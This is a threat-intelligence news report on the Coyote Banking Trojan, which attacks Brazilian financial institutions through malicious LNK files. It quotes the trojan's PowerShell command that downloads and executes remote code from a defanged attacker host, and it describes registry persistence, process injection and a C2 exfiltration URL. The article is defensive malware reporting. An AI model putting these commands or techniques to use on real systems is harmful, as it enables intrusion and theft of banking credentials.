A new wave of cyberattacks leveraging the Coyote Banking Trojan has been identified, targeting financial institutions in Brazil.
This sophisticated malware employs malicious Windows LNK (shortcut) files as an entry point to execute PowerShell scripts, enabling multi-stage infection chains that ends in data theft and system compromise.
The attack begins with a malicious LNK file that executes a stealthy PowerShell command.
This command connects to a remote server to download additional payloads. The initial PowerShell script is as follows:-
-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."Fortinet researchers noted that this script initiates the download of encoded shellcode, which is decoded and executed to load the next stage of the attack.
.webp)
Attack Process
- LNK File Exploitation: The shortcut file is crafted to include malicious arguments in its “Target” field. Upon execution, it triggers the embedded PowerShell script.
- Example Target Path:
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File malicious.ps1.
.webp)
- Payload Delivery: The downloaded script decodes two embedded data segments and injects them into memory using Windows API functions like
VirtualAllocExandWriteProcessMemory. This process is facilitated by a loader DLL (bmwiMcDec), which usesCreateRemoteThreadto execute the injected code. - Persistence Mechanism: The malware modifies the Windows Registry at:-
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunIt creates a new entry with a randomized name pointing to a Base64-encoded PowerShell command for subsequent payload execution.
- Command and Control (C2) Communication: Coyote establishes secure communication with its C2 servers using SSL channels. It transmits system information, including machine name, username, and antivirus details, encoded in Base64 and reversed for obfuscation. Example URL:
hxxps://yezh[.]geontrigame[.]com/hqizjs/?I=y4CMuADfvJHUgATMgM3dvRmbpdFIOZ2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzImcoNEfOIDROUIThe malware offers multitude of capabilities like keylogging and screenshot capture, displaying phishing overlays mimicking banking interfaces, terminating processes and shutting down systems, and blocking user access with deceptive messages like “Working on updates.”
Coyote employs modern programming tools like Nim and Node.js, enhancing its stealth and complexity.
The malware uses DLL side-loading via legitimate executables (obs-browser-page.exe) to evade detection.
Additionally, it leverages the Squirrel installer framework for distribution, disguising itself as a legitimate update package.
Coyote primarily targets over 70 Brazilian financial institutions and cryptocurrency platforms.
It monitors active windows for specific banking applications or websites, initiating malicious actions when detected.
To protect against such threats, avoid opening unsolicited LNK files and ensure antivirus software is regularly updated with signatures capable of detecting threats like LNK/Agent.D!tr.
Monitoring registry changes for unauthorized entries helps detect suspicious activity, while implementing endpoint detection tools enables the analysis of PowerShell activity for potential threats.
Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request